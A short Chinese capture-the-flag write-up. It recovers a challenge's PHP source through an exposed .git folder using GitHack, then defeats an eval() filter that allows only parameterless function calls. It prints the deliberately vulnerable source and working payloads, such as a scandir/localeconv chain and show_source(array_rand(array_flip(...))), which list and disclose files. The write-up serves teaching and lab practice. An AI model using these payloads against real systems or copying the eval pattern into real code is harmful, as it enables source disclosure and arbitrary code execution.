主页只有一句：flag在哪里呢？

经测试存在/.git，可以利用githack读取源代码。
GitHub - lijiejie/GitHack: A `.git` folder disclosure exploit

<?php
include "flag.php";
echo "flag在哪里呢？<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦！");
            }
        }
        else{
            die("再好好想想！");
        }
    }
    else{
        die("还想读flag，臭弟弟！");
    }
}
// highlight_file(__FILE__);
?>

通过分析代码得出：

1.需要以GET形式传入一个名为exp的参数。如果满足条件会执行这个exp参数的内容。
2.不能以伪协议读取文件。
3.(?R)引用当前表达式，后面加了?递归调用。只能匹配通过无参数的函数。
4.正则匹配掉了et/na/info等关键字，很多函数都用不了。

首先需要得到当前目录下的文件。可以：

print_r(scandir(current(localeconv())));

其中函数localeconv()，会返回一个数组，数组第一项就是.
那么用current(localeconv())取出第一项，所以current(localeconv())是一个.
current()在php手册中的介绍如下，不能直接得到倒数第二组中的内容：

我们把上面得到的数组的键名和键值颠倒：

然后利用array_rand函数读取键名，最后利用show_source显示源码：

?exp=show_source(array_rand(array_flip(scandir(current(localeconv())))));